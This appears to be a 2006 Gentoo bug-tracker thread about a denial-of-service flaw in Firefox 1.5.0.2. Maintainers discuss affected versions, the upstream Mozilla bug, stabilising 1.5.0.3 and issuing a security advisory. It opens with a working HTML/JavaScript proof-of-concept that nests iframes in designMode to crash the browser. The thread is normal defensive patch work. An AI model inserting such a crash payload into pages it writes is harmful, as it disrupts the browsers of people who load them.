http://archives.neohapsis.com/archives/bugtraq/2006-04/0502.html ** firefox 1.5.0.2 is already marked stable for ppc and amd64. ** ------------------------------------------------------------ http://www.securident.com/vuln/ffdos.htm - PoC firefox dos Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above. <textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> <script> var textarea = document.getElementsByName("x_OtherInfo"); textarea=textarea.item(0); var htmlarea = document.createElement("div"); htmlarea.className = "htmlarea"; textarea.parentNode.insertBefore(htmlarea, textarea); var iframe = document.createElement("iframe"); htmlarea.appendChild(iframe); var doc = iframe.contentWindow.document; doc.designMode = "on"; doc.open(); doc.write("<iframe src=''>"); iframe.contentWindow.focus() doc.close(); </script> </textarea>
firefox 1.0.8 is NOT affected
in order for this to be of importance a user must have javascript enabled, enabling javascript globally is a mistake in itself. Bug does nothing but serve as reference for those who might experience the javascript bug.
AFAIR it is enabled by default in 1.5.
(In reply to comment #2) > in order for this to be of importance a user must have javascript enabled, > enabling javascript globally is a mistake in itself. Bug does nothing but serve > as reference for those who might experience the javascript bug. Personally I wouldn't even disagree, but I know there are enough who would, since there are too much broken websites not working (properly) without Javascript. Not too long ago even our bugzilla help page was not reachable without it. And expecting Joe user to take care about a problem, he usually is not even aware about, is not realistic anyways.
seamonkey seems to be affected, too...
Can't find an upstream bug for this. Setting to A because we can assume almost everyone keeps JavaScript enabled.
(In reply to comment #4) > Personally I wouldn't even disagree, but I know there are enough who would, > since there are too much broken websites not working (properly) without > Javascript. Being a big fan of the NoScript extension, I agree. Like bugs.gentoo.org, for example (quicksearch). (In reply to comment #6) > Can't find an upstream bug for this. > Setting to A because we can assume almost everyone keeps JavaScript enabled. https://bugzilla.mozilla.org/show_bug.cgi?id=334515
1.5.0.3 is in the tree mark it stable, amd64 do not forget -bin.
ff-1.5.0.3 source stable, leaving amd64 alias until -bin is stablized.
mozilla-firefox-bin-1.5.0.3 stable on amd64.
www-client/mozilla-firefox-1.5.0.3 stable on ppc. No -bin-pkg available.
Drafting... bug 132080 might be not new. What's the policy in this case ? We're waiting before sending GLSA or not ?
Yes, that's probably an old bug. GLSA 200605-06 done.